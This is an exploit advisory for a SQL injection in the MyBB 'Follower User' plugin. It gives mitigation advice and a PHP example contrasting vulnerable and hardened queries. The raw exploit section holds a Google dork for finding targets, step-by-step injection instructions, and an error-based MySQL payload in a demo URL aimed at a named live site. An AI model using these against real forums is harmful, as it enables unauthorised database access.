Vendor: Follower User Plugin
By: Zixem
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Follower User Plugin
Affected Version From: 1.5+
Affected Version To: 1.5+
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
Year: 2012

Follower User MyBB plugin SQL Injection 0day

The vulnerability is in SuscribeUsers.php, in SuscribeUsers_add(): the 'usid' and 'uid' request parameters are read straight from $mybb->input and handed to user_awaiting() without being validated as integers or escaped, so whatever the attacker places in the query string reaches the SQL statement. The published payload targets the 'usid' parameter of misc.php, with 'uid' set to the attacker's own user ID (any registered account will do). An example malicious URL is '/misc.php?suscriberuser=yes&usid='[SQLi]--+-&uid=[Your_User_ID]'. The demo below uses an error-based technique (a GROUP BY on concat_ws(0x7e, version(), floor(rand(0)*2)) that provokes a MySQL duplicate-entry error whose message echoes the server version), which lets an attacker read database contents one value at a time. Arbitrary code execution is not demonstrated and would depend on the database account's privileges and the server configuration.

Mitigation:

Both IDs are integers, so cast them before use (intval($mybb->input['uid']) and intval($mybb->input['usid']) on MyBB 1.6) and pass only the cast values to the query; any string value that must reach SQL should go through $db->escape_string() or a parameterized query rather than direct concatenation. Rejecting non-numeric IDs with an error instead of redirecting also removes the attacker's feedback channel. A vendor patch exists; upgrade to a fixed release.
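The following is an added example, not the plugin's code and not the author's exploit: it mirrors the lookup that SuscribeUsers_add() performs through user_awaiting(), once written the vulnerable way (raw request values concatenated into the WHERE clause) and once hardened with an integer cast and bound parameters, then runs the advisory's injection shape against both. The table and column names (suscribeusers_awaiting, uid, usid) are assumptions, and it uses PDO with an in-memory SQLite database so it runs stand-alone instead of the MyBB $db wrapper.

```php
<?php
// Added example, not part of the original advisory or the plugin.
// Table and column names are assumed; SQLite via PDO stands in for MyBB's $db.

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE suscribeusers_awaiting (uid INTEGER, usid INTEGER)");
// Two pending subscriptions: user 5 -> user 7, user 6 -> user 8 (constructed data).
$pdo->exec("INSERT INTO suscribeusers_awaiting VALUES (5, 7), (6, 8)");

// Vulnerable pattern: the values from $mybb->input['uid'] / ['usid'] are
// interpolated into the SQL text, so a quote in $usid ends the literal and
// the rest of the parameter is parsed as SQL.
function user_awaiting_vulnerable(PDO $pdo, $uid, $usid)
{
    $sql = "SELECT COUNT(*) FROM suscribeusers_awaiting "
         . "WHERE uid='$uid' AND usid='$usid'";
    return (int) $pdo->query($sql)->fetchColumn();
}

// Hardened pattern: both IDs are integers by definition, so cast them
// (the MyBB 1.6 idiom is intval($mybb->input['uid'])) and bind them as
// parameters; the attacker's string never reaches the SQL parser.
function user_awaiting_hardened(PDO $pdo, $uid, $usid)
{
    $uid  = (int) $uid;
    $usid = (int) $usid;
    $stmt = $pdo->prepare(
        "SELECT COUNT(*) FROM suscribeusers_awaiting WHERE uid = ? AND usid = ?"
    );
    $stmt->execute([$uid, $usid]);
    return (int) $stmt->fetchColumn();
}

// Constructed input in the advisory's shape:
//   /misc.php?suscriberuser=yes&usid='[SQLi]--+-&uid=5
// After URL decoding, "--+-" becomes "-- -", a comment that swallows the
// closing quote the application appends.
$uid  = '5';
$usid = "' OR 1=1 -- -";

// Vulnerable: WHERE uid='5' AND usid='' OR 1=1 -- -'  -> every row matches.
printf("vulnerable: %d row(s)\n", user_awaiting_vulnerable($pdo, $uid, $usid));
// Hardened: usid casts to 0, no row has usid 0 -> nothing matches.
printf("hardened:   %d row(s)\n", user_awaiting_hardened($pdo, $uid, $usid));
// Hardened with legitimate IDs still finds the pending subscription.
printf("hardened, valid ids: %d row(s)\n", user_awaiting_hardened($pdo, '5', '7'));
```

Run with `php example.php` (the pdo_sqlite extension must be loaded). The vulnerable function reports 2 rows for the injected usid, the hardened one reports 0 for the same input and 1 for the genuine pair, which is the behaviour the cast-and-bind fix should preserve. The MySQL-specific floor(rand(0)*2) error-based payload from the demo cannot be reproduced under SQLite, but it enters the query through exactly the same unquoted usid position.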

Exploit-DB raw data:

# Exploit Title: Follower User MyBB plugin SQL Injection 0day
# Google Dork: intext:"Users subscribed to" inurl:member.php -site:fwcombie.us
# Date: 13.10.2012
# Exploit Author: Zixem
# Software Link: http://mods.mybb.com/view/suscriber-user
# Version: 1.5+
# Tested on: Linux.
----------------------------------------------

The vulnerability exists within SuscribeUsers.php on SuscribeUsers_add():

<?php
	// Request parameters taken from $mybb->input with no intval() and no escaping
	$usid = $mybb->input['usid'];	//Line 671
	$uid = $mybb->input['uid'];	//Line 672
	// Both raw values are passed on to user_awaiting(), which uses them in a query
	if(user_awaiting($uid,$usid))	//Line 781
	{				//Line 782
		redirect("member.php?action=profile&uid=".$usid."#suscriberuser", $lang->double_suscription_awaiting,$lang->suscriberuser); // Line 783
	}				//Line 784
?>


----------------------------------------------

Instructions: 
1. Create a new account on the target site.
2. Check your User ID by entering your profile link and write it down.
3. Enter here and start to inject your code:

/misc.php?suscriberuser=yes&usid='[SQLi]--+-&uid=[Your_User_ID]

----------------------------------------------

Demo: 
http://www.chidomobil-gc.com/misc.php?suscriberuser=yes&usid=' or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0)--+-2&uid=[your_uid]
Image : http://i.imgur.com/eGhzJ.png


Follow: https://twitter.com/PonyBlaze


Shoutouts go to FillySec.